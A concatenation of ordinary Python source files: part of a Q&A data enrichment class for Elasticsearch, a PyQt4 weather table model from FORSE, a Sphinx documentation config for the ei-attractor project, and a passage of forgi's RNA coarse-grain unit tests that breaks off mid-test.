copy_fields += common_fields
for f in copy_fields:
if f in question:
eitem[f] = question[f]
else:
eitem[f] = None
eitem["content_analyzed"] = question['content']
# Fields which names are translated
map_fields = {
"id": "question_id",
"num_votes": "score"
}
for fn in map_fields:
eitem[map_fields[fn]] = question[fn]
tags = ''
for tag in question['tags']:
tags += tag['slug'] + ","
tags = tags[0:-1] # remove last ,
eitem["tags"] = tags
eitem["tags_analyzed"] = tags
# Enrich dates
eitem["creation_date"] = parser.parse(question["created"]).isoformat()
eitem["last_activity_date"] = parser.parse(question["updated"]).isoformat()
eitem['lifetime_days'] = \
get_time_diff_days(question['created'], question['updated'])
eitem.update(self.get_grimoire_fields(question['created'], "question"))
eitem['author'] = question['creator']['username']
if question['creator']['display_name']:
eitem['author'] = question['creator']['display_name']
if self.sortinghat:
eitem.update(self.get_item_sh(item))
elif kind == 'answer':
answer = item
eitem['type'] = kind
# data fields to copy
copy_fields = ["content", "solution"]
copy_fields += common_fields
for f in copy_fields:
if f in answer:
eitem[f] = answer[f]
else:
eitem[f] = None
eitem["content_analyzed"] = answer['content']
# Fields which names are translated
map_fields = {
"id": "answer_id",
"question": "question_id",
"num_helpful_votes": "score",
"num_unhelpful_votes":"unhelpful_answer"
}
for fn in map_fields:
eitem[map_fields[fn]] = answer[fn]
eitem["helpful_answer"] = answer['num_helpful_votes']
# Enrich dates
eitem["creation_date"] = parser.parse(answer["created"]).isoformat()
eitem["last_activity_date"] = parser.parse(answer["updated"]).isoformat()
eitem['lifetime_days'] = \
get_time_diff_days(answer['created'], answer['updated'])
eitem.update(self.get_grimoire_fields(answer['created'], "answer"))
eitem['author'] = answer['creator']['username']
if answer['creator']['display_name']:
eitem['author'] = answer['creator']['display_name']
if self.sortinghat:
# date field must be the same than in question to share code
answer[self.get_field_date()] = answer['updated']
eitem[self.get_field_date()] = answer[self.get_field_date()]
eitem.update(self.get_item_sh(answer))
return eitem
def enrich_items(self, items):
max_items = self.elastic.max_items_bulk
current = 0
bulk_json = ""
total = 0
url = self.elastic.index_url+'/items/_bulk'
logging.debug("Adding items to %s (in %i packs)", url, max_items)
for item in items:
if current >= max_items:
self.requests.put(url, data=bulk_json)
bulk_json = ""
current = 0
rich_item = self.get_rich_item(item)
data_json = json.dumps(rich_item)
bulk_json += '{"index" : {"_id" : "%s" } }\n' % \
(item[self.get_field_unique_id()])
bulk_json += data_json +"\n" # Bulk document
current += 1
total += 1
# Time to enrich also de answers
if 'answers_data' in item['data']:
for answer in item['data']['answers_data']:
# Add question title in answers
answer['title'] = item['data']['title']
answer['solution'] = 0
if answer['id'] == item['data']['solution']:
answer['solution'] = 1
rich_answer = self.get_rich_item(answer, kind='answer')
data_json = json.dumps(rich_answer)
bulk_json += '{"index" : {"_id" : "%s_%i" } }\n' % \
(item[self.get_field_unique_id()],
rich_answer['answer_id'])
bulk_json += data_json +"\n" # Bulk document
current += 1
total += 1
self.requests.put(url, data = bulk_json)
return total
|
Pesa/forse
|
src/forse/weather_station/WeatherModel.py
|
###########################################################################
#
# Copyright (c) 2010 Davide Pesavento <davidepesa@gmail.com>
#
# This file is part of FORSE.
#
# FORSE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# FORSE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with FORSE. If not, see <http://www.gnu.org/licenses/>.
#
###########################################################################
from PyQt4.Qt import Qt
from PyQt4.QtCore import QAbstractTableModel, QVariant
from PyQt4.QtGui import QIcon
from OTPApplication import OTPApplication
class WeatherModel(QAbstractTableModel):
def __init__(self):
QAbstractTableModel.__init__(self)
self.__changes = {}
self.__weather = {}
self.__sun = QIcon(":/icons/sun.png")
self.__lightRain = QIcon(":/icons/light-rain.png")
self.__rain = QIcon(":/icons/rain.png")
self.__heavyRain = QIcon(":/icons/heavy-rain.png")
self.__icons = [self.__sun]
self.__icons[1:3] = [self.__lightRain] * 3
self.__icons[4:7] = [self.__rain] * 4
self.__icons[8:10] = [self.__heavyRain] * 3
handlers = {('init', 'weather'): self._setWeather,
('update', 'weather'): self._setWeather}
OTPApplication.registerMsgHandlers(handlers)
def changes(self):
return self.__changes.items()
def discardChanges(self):
self.__changes = {}
self.reset()
def columnCount(self, _parent):
return 3
def rowCount(self, _parent):
return len(self.__weather)
def flags(self, index):
flags = QAbstractTableModel.flags(self, index)
if index.column() == 2:
flags |= Qt.ItemIsEditable
return flags
def data(self, index, role):
if role == Qt.DisplayRole:
try:
if index.column() == 0:
return QVariant(index.row())
elif index.column() == 1:
return QVariant(self.__weather[index.row()])
elif index.column() == 2:
return QVariant(self.__changes[index.row()])
except KeyError:
pass
elif role == Qt.DecorationRole and index.column() == 1:
return QVariant(self.__icons[self.__weather[index.row()]])
elif role == Qt.EditRole and index.column() == 2:
try:
return QVariant(self.__changes[index.row()])
except KeyError:
return QVariant(self.__weather[index.row()])
elif role == Qt.TextAlignmentRole:
return QVariant(Qt.AlignCenter)
return QVariant()
def headerData(self, section, orientation, role):
if orientation == Qt.Horizontal and role == Qt.DisplayRole:
if section == 0:
return QVariant("Sector")
elif section == 1:
return QVariant("Current")
elif section == 2:
return QVariant("Local changes")
return QVariant()
def setData(self, index, value, role):
changed = False
if index.column() == 2 and role == Qt.EditRole:
r = index.row()
if value != self.__weather[r]:
self.__changes[r] = value
changed = True
elif r in self.__changes:
del self.__changes[r]
changed = True
if changed:
self.dataChanged.emit(index, index)
return changed
def _setWeather(self, weather):
for sectId, rain in weather:
self.__weather[sectId] = rain
try:
if self.__changes[sectId] == rain:
del self.__changes[sectId]
except KeyError:
pass
self.reset()
|
MattNolanLab/ei-attractor
|
doc/conf.py
|
# -*- coding: utf-8 -*-
#
# Grid cell modeling and data analysis documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 31 21:47:10 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if on_rtd:
print('Inside RTD environment!')
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('../simtools'))
sys.path.insert(0, os.path.abspath('../noisefigs'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.pngmath',
'sphinx.ext.mathjax',
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.todo',
'sphinx.ext.inheritance_diagram',
'numpydoc'
]
# Include todos?
todo_include_todos = True
#
# Fix an issue with nonexistent documents:
# https://github.com/phn/pytpm/issues/3#issuecomment-12133978
numpydoc_show_class_members = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ei-attractor'
copyright = u'2010-2015, Lukas Solanka'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'data_descriptions/*']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
if on_rtd:
html_theme = 'default'
html_context = {
'css_files': [
'https://media.readthedocs.org/css/sphinx_rtd_theme.css',
'https://media.readthedocs.org/css/readthedocs-doc-embed.css',
'_static/theme_overrides.css',
],
}
else:
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
def setup(app):
app.add_stylesheet('theme_overrides.css')
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Gridcellmodelinganddataanalysisdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Gridcellmodelinganddataanalysis.tex', u'Grid cell modeling and data analysis Documentation',
u'Lukas Solanka', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'gridcellmodelinganddataanalysis', u'Grid cell modeling and data analysis Documentation',
[u'Lukas Solanka'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Gridcellmodelinganddataanalysis', u'Grid cell modeling and data analysis Documentation',
u'Lukas Solanka', 'Gridcellmodelinganddataanalysis', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# inheritance
inheritance_graph_attrs = dict(rankdir="TB", fontsize=14, ratio='compress')
graphviz_output_format = 'svg'
##############################################################################
class Mock(object):
__all__ = []
def __init__(self, *args, **kwargs):
pass
def __call__(self, *args, **kwargs):
return Mock()
@classmethod
def __getattr__(cls, name):
if name in ('__file__', '__path__'):
return '/dev/null'
elif name[0] == name[0].upper():
mockType = type(name, (), {})
mockType.__module__ = __name__
return mockType
else:
return Mock()
class NestMock(Mock):
def __init__(self, *args, **kwargs):
pass
@classmethod
def __getattr__(cls, name):
if name in ('__file__', '__path__'):
return '/dev/null'
elif name[0] == name[0].upper():
mockType = type(name, (), {})
mockType.__module__ = __name__
return mockType
else:
return NestMock()
def Install(self, *args, **kwargs):
pass
MOCK_MODULES = [
'numpy', 'numpy.ma', 'numpy.ma.core', 'numpy.fft', 'numpy.fft.fftpack',
'numpy.random', 'numpy.core', 'numpy.core.umath',
'scipy', 'scipy.integrate', 'scipy.signal', 'scipy.ndimage', 'scipy.stats',
'scipy.ndimage.interpolation', 'scipy.optimize', 'scipy.interpolate',
'scipy.io',
'matplotlib', 'matplotlib.axes', 'matplotlib.pyplot', 'matplotlib.patches',
'matplotlib.ticker', 'matplotlib.colors', 'matplotlib.transforms',
'matplotlib.colorbar', 'matplotlib.gridspec', 'matplotlib.backends',
'matplotlib.backends.backend_pdf',
'grid_cell_model.analysis.Wavelets',
'gridcells', 'gridcells.analysis', 'gridcells.analysis.signal',
'pyentropy', 'minepy',
'configobj',
]
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = Mock()
sys.modules['nest'] = NestMock()
|
ViennaRNA/forgi
|
test/forgi/threedee/model/coarse_grain_test.py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from builtins import range
import warnings
import unittest
import sys
import itertools as it
import copy
import time
import math
import logging
import os.path
import os
import shutil
import contextlib
try:
from unittest.mock import patch
except ImportError:
from mock import patch
import numpy as np
import numpy.testing as nptest
import forgi.threedee.model.coarse_grain as ftmc
import forgi.graph.bulge_graph as fgb
import forgi.threedee.model.similarity as ftme
import forgi.threedee.utilities.graph_pdb as ftug
import forgi.threedee.utilities.vector as ftuv
import forgi.utilities.debug as fud
from forgi.utilities.stuff import make_temp_directory
from ...graph import bulge_graph_test as tfgb
log = logging.getLogger(__name__)
@contextlib.contextmanager
def ignore_warnings():
with warnings.catch_warnings():
warnings.simplefilter("ignore")
yield None
def cg_from_sg(cg, sg):
'''
Create a coarse-grain structure from a subgraph.
@param cg: The original structure
@param sg: The list of elements that are in the subgraph
'''
new_cg = ftmc.cg_from_sg(cg, sg)
return new_cg
for d in sg:
new_cg.defines[d] = cg.defines[d]
if d in cg.coords.keys():
new_cg.coords[d] = cg.coords[d]
if d in cg.twists.keys():
new_cg.twists[d] = cg.twists[d]
if d in cg.longrange.keys():
new_cg.longrange[d] = cg.longrange[d]
for x in cg.edges[d]:
if x in new_cg.defines.keys():
new_cg.edges[d].add(x)
new_cg.edges[x].add(d)
return new_cg
def mock_run_mc_annotate(original_function):
"""
Caching of MC-Annotate output for speedup
"""
def mocked_run_mc_annotate(filename, subprocess_kwargs):
new_fn = os.path.split(filename)[1]
new_fn += ".mcAnnotate.out"
try:
with open(os.path.join("test", "forgi", "threedee", "data", new_fn)) as f:
lines = f.readlines()
log.error("Using cached MC-Annotate output")
except IOError: # on py3 this is an alias of oserror
lines = original_function(filename, subprocess_kwargs)
with open(os.path.join("test", "forgi", "threedee", "data", new_fn), "w") as f:
print("\n".join(lines), file=f)
log.info("Returning lines: %s", lines)
return lines
return mocked_run_mc_annotate
def mocked_read_config():
"""
Require MC-Annotate for consistency. If not installed, tests should be skipped.
"""
if not ftmc.which("MC-Annotate"):
raise unittest.SkipTest("This Test requires MC-Annotate for consistency.")
else:
return {"PDB_ANNOTATION_TOOL": "MC-Annotate"}
@patch('forgi.config.read_config', mocked_read_config)
@patch('forgi.threedee.model.coarse_grain._run_mc_annotate',
mock_run_mc_annotate(ftmc._run_mc_annotate))
class CoarseGrainIoTest(tfgb.GraphVerification):
def check_cg_integrity(self, cg):
self.assertGreater(len(list(cg.stem_iterator())), 0)
for s in cg.stem_iterator():
edges = list(cg.edges[s])
if len(edges) < 2:
continue
multiloops = False
for e in edges:
if e[0] != 'i':
multiloops = True
if multiloops:
continue
self.assertFalse(np.allclose(cg.coords[edges[0]][0],
cg.coords[edges[1]][0]))
self.assertFalse(np.allclose(cg.coords[edges[0]][0],
cg.coords[edges[1]][1]))
self.assertFalse(np.allclose(cg.coords[edges[0]][1],
cg.coords[edges[1]][0]))
self.assertFalse(np.allclose(cg.coords[edges[0]][1],
cg.coords[edges[1]][1]))
def test_dssr_backslash_in_filename(self):
"""
DSSR puts the input filename in the JSON, which makes the JSON invalid,
if a backslash is in it. We patch the DSSR JSON before parsing.
"""
with make_temp_directory() as d:
# On Windows, bla is a directory, and the backslash is
# part of the path,
# on decent operating systems,
# the backslash is part of the filename.
filename=os.path.join(d, "bla\\something.pdb")
dir, rest = os.path.split(filename)
# On Windows, make the directory bla, on Linux do nothing
try:
os.makedirs(dir)
except OSError:
# Directory exists
pass
shutil.copy('test/forgi/threedee/data/1y26.pdb', filename)
try:
# Make sure we do not raise any error.
cg, = ftmc.CoarseGrainRNA.from_pdb(filename,
annotation_tool="DSSR")
except ftmc.AnnotationToolNotInstalled:
self.skipTest("This Test requires DSSR")
self.check_graph_integrity(cg)
self.assertGreater(len(cg.defines), 2)
def test_from_mmcif(self):
import Bio.PDB as bpdb
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1Y26.cif')
cg2, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/1y26.pdb')
self.assertEqual(cg.defines, cg2.defines)
self.assertGreater(len(cg.defines), 3)
for d in cg.defines:
nptest.assert_almost_equal(cg.coords[d], cg2.coords[d])
def test_from_mmcif_missing_residues(self):
import Bio.PDB as bpdb
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/2x1f.cif', load_chains="B")
cg2, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/2X1F.pdb', load_chains="B")
log.error(cg.seq._missing_nts)
self.assertEqual(len(cg.seq._missing_nts), 3)
self.assertEqual(len(cg2.seq._missing_nts), 3)
self.assertEqual(cg.seq, cg2.seq)
def test_from_pdb(self):
import time
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/4GV9.pdb', load_chains='E')
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/RS_363_S_5.pdb')
log.error(time.time() - now)
now = time.time()
self.check_cg_integrity(cg)
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/RS_118_S_0.pdb')
log.error(time.time() - now)
now = time.time()
self.check_cg_integrity(cg)
log.error(time.time() - now)
now = time.time()
self.assertTrue(len(cg.defines) > 1)
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/ideal_1_4_5_8.pdb')
self.check_cg_integrity(cg)
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/ideal_1_4_5_8.pdb')
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/1y26_missing.pdb')
self.check_cg_integrity(cg)
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1y26_two_chains.pdb',
load_chains='Y')
self.assertEqual(len(cg.defines), 1)
self.assertIn("f0", cg.defines)
self.assertEqual(cg.seq, "U")
log.error(time.time() - now)
now = time.time()
# commented out for 3 ec speedup
# cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1X8W.pdb',
# load_chains='A')
# self.check_cg_integrity(cg)
#log.error (time.time()-now); now=time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/1FJG_reduced.pdb')
self.check_cg_integrity(cg)
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1y26.pdb')
log.error(time.time() - now)
now = time.time()
def test_file_with_numeric_chain_id(self):
# Numeric chain ids
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/3J7A_part.pdb', load_chains=["7"])
self.check_cg_integrity(cg)
self.assertEqual(cg.seq._seqids[0].chain, '7')
def test_from_pdb_cofold(self):
# 1FUF triggers the if fromA.chain != fromB.chain clause in _are_adjacent_basepairs
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1FUF.pdb',
dissolve_length_one_stems=True)
self.check_cg_integrity(cg)
def verify_multiple_chains(self, cg, single_chain_cgs):
log.warning("Backbone in %s breaks after %s",
cg.name, cg.backbone_breaks_after)
self.assertEqual(len(cg.backbone_breaks_after),
len(single_chain_cgs) - 1)
self.assertEqual(cg.seq_length, sum(
x.seq_length for x in single_chain_cgs))
# There might be stems spanning multiple chains.
self.assertGreaterEqual(len([s for s in cg.defines if s[0] == "s"]), len(
[s for c in single_chain_cgs for s in c.defines if s[0] == "s"]))
self.assertEqual(cg.seq, "&".join(str(x.seq)
for x in single_chain_cgs))
def test_from_pdb_f_in_second_chain(self):
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/4GV9.pdb', load_chains=None)
self.assertEqual(set(cg.defines.keys()), set(["t0", "s0", "f0"]))
def test_from_pdb_multiple(self):
cgE, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/4GV9.pdb', load_chains='E')
cgF, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/4GV9.pdb', load_chains='F')
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/4GV9.pdb', load_chains=None)
self.assertEqual(set(cg.chains.keys()), set(["E", "F"]))
self.assertEqual(len(cg.backbone_breaks_after), 1)
bp = cg.backbone_breaks_after[0]
self.assertEqual(bp, 3)
self.assertEqual(cg.seq[:bp], cgE.seq)
self.assertEqual(cg.seq[1:bp], cgE.seq)
self.assertEqual(cg.seq[bp + 1:], cgF.seq)
self.verify_multiple_chains(cg, [cgE, cgF])
cgA, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/3CQS.pdb', load_chains='A')
cgB, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/3CQS.pdb', load_chains='B')
cgC, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/3CQS.pdb', load_chains='C')
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/3CQS.pdb', load_chains=None)
log.warning("cg now has %s cutpoints: %s", len(
cg.seq._breaks_after), cg.backbone_breaks_after)
self.verify_multiple_chains(cg, [cgA, cgB, cgC])
def test_multiple_chain_to_cg(self):
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/4GV9.pdb', load_chains=None)
log.debug("======= FIRST IS LOADED =========")
cg_str = cg.to_cg_string()
log.debug("\n" + cg_str)
print(cg_str)
cg2 = ftmc.CoarseGrainRNA.from_bg_string(cg_str)
self.assertEqual(cg.defines, cg2.defines)
self.assertLess(ftme.cg_rmsd(cg, cg2), 10**-6)
self.assertEqual(cg.backbone_breaks_after, cg2.backbone_breaks_after)
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/3CQS.pdb', load_chains=None)
cg.log(logging.WARNING)
cg_str = cg.to_cg_string()
cg2 = ftmc.CoarseGrainRNA.from_bg_string(cg_str)
self.assertEqual(cg.defines, cg2.defines)
# This only looks at stems
self.assertLess(ftme.cg_rmsd(cg, cg2), 10**-6)
self.assertEqual(cg.backbone_breaks_after, cg2.backbone_breaks_after)
def test_connected_cgs_from_pdb(self):
cgs = ftmc.CoarseGrainRNA.from_pdb("test/forgi/threedee/data/1DUQ.pdb")
self.assertEqual(len(cgs), 4)
# This PDB file contains 4 similar RNA dimers
self.assertEqual(cgs[0].name, "1DUQ_A-B")
self.assertEqual(cgs[1].name, "1DUQ_C-D")
self.assertEqual(cgs[2].name, "1DUQ_E-F")
self.assertEqual(cgs[3].name, "1DUQ_G-H")
self.assertEqual(cgs[0].defines, cgs[2].defines)
self.assertEqual(cgs[1].defines, cgs[3].defines)
def test_multiple_models_in_file(self):
with self.assertWarns(UserWarning) if hasattr(self, 'assertWarns') else ignore_warnings():
cgs = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1byj.pdb')
self.assertEqual(len(cgs), 1) # Only look at first model!
def test_annotating_with_dssr(self):
pass
class CoarseGrainTest(tfgb.GraphVerification):
'''
Simple tests for the BulgeGraph data structure.
For now the main objective is to make sure that a graph is created
and nothing crashes in the process. In the future, test cases for
bugs should be added here.
'''
def setUp(self):
self.longMessage = True
def check_cg_integrity(self, cg):
for s in cg.stem_iterator():
edges = list(cg.edges[s])
if len(edges) < 2:
continue
multiloops = False
for e in edges:
if e[0] != 'i':
multiloops = True
if multiloops:
continue
self.assertFalse(np.allclose(cg.coords[edges[0]][0],
cg.coords[edges[1]][0]))
self.assertFalse(np.allclose(cg.coords[edges[0]][0],
cg.coords[edges[1]][1]))
self.assertFalse(np.allclose(cg.coords[edges[0]][1],
cg.coords[edges[1]][0]))
self.assertFalse(np.allclose(cg.coords[edges[0]][1],
cg.coords[edges[1]][1]))
def compare_bg_to_cg(self, bg, cg):
for d in bg.defines.keys():
self.assertTrue(d in cg.defines.keys())
self.assertTrue(bg.defines[d] == cg.defines[d])
for e in bg.edges.keys():
self.assertTrue(e in cg.edges.keys())
self.assertTrue(bg.edges[e] == cg.edges[e])
def test_get_node_from_residue_num(self):
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1X8W.pdb',
load_chains='A', dissolve_length_one_stems=True)
self.check_cg_integrity(cg)
elem_name = cg.get_node_from_residue_num(1)
cg.log()
self.assertEqual(elem_name, "f0")
def test_from_cg(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
self.check_graph_integrity(cg)
self.check_cg_integrity(cg)
# self.assertEqual(len(cg.coords), 8)
for key in cg.defines.keys():
self.assertTrue(key in cg.coords)
def test_from_and_to_cgstring(self):
cg1 = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
cg1.project_from = np.array([1, 2, 3.5])
stri = cg1.to_cg_string()
cg2 = ftmc.CoarseGrainRNA.from_bg_string(stri)
for key in set(cg1.defines):
self.assertTrue(key in cg2.defines)
self.assertTrue(key in cg2.coords)
nptest.assert_allclose(cg1.defines[key], cg2.defines[key])
nptest.assert_allclose(cg1.coords[key][0], cg2.coords[key][0])
nptest.assert_allclose(cg1.coords[key][1], cg2.coords[key][1])
for key in set(cg2.defines):
self.assertTrue(key in cg1.defines)
self.assertTrue(key in cg1.coords)
nptest.assert_allclose(cg1.defines[key], cg2.defines[key])
nptest.assert_allclose(cg1.coords[key][0], cg2.coords[key][0])
nptest.assert_allclose(cg1.coords[key][1], cg2.coords[key][1])
nptest.assert_allclose(cg1.project_from, cg2.project_from)
def test_to_and_from_cgstring_vres(self):
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2mis.pdb')
cg.add_all_virtual_residues()
cgstri = cg.to_cg_string()
self.assertIn("vres", cgstri)
cg2 = ftmc.CoarseGrainRNA.from_bg_string(cgstri)
self.assertEqual(
len(cg2.vposs["h0"]), cg2.defines["h0"][1] - cg2.defines["h0"][0] + 1)
self.assertLess(ftuv.vec_distance(
cg.vposs["h0"][0], cg2.vposs["h0"][0]), 10**-8)
self.assertLess(ftuv.vec_distance(
cg.vposs["i0"][2], cg2.vposs["i0"][2]), 10**-8)
def test_get_bulge_angle_stats_core(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
self.check_graph_integrity(cg)
for d in cg.mloop_iterator():
cg.get_bulge_angle_stats(d)
def test_get_bulge_angle_stats_for_start(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
s1, s2 = cg.get_bulge_angle_stats("start")
def test_read_longrange_interactions(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
self.check_graph_integrity(cg)
self.assertGreater(len(cg.longrange), 0)
def test_radius_of_gyration(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
self.check_graph_integrity(cg)
rog = cg.radius_of_gyration()
self.assertGreater(rog, 0.)
maxDist = max(ftuv.vec_distance(p0, p1) for p0, p1 in it.combinations(cg.coords._coordinates, 2))
estimated_radius_circum_cricle = maxDist / 2
# NOTE: The ROG is 0.77 times the radius of the circumcircle, for m->inf many points
# in a 3D unit sphere with the nth point placed at radius (n/m)**1/3
self.assertLess(rog, estimated_radius_circum_cricle * 0.77)
def test_radius_of_gyration_different_methods(self):
cg = ftmc.CoarseGrainRNA.from_bg_file(
'test/forgi/threedee/data/1y26.cg')
rog_fast = cg.radius_of_gyration(method="fast")
